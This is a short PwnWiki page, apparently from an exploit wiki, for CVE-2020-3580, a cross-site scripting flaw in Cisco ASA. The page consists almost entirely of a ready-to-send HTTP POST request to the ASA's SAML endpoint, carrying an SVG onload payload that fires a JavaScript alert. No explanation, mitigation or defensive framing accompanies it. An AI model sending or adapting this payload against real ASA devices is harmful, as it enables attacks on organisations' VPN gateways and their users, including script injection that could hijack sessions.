CVE-2020-3580 Cisco ASA XSS漏洞

From PwnWiki
Revision as of 09:16, 29 June 2021 by Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=a...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

XSS

POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

SAMLResponse="><svg/onload=alert('PTSwarm')>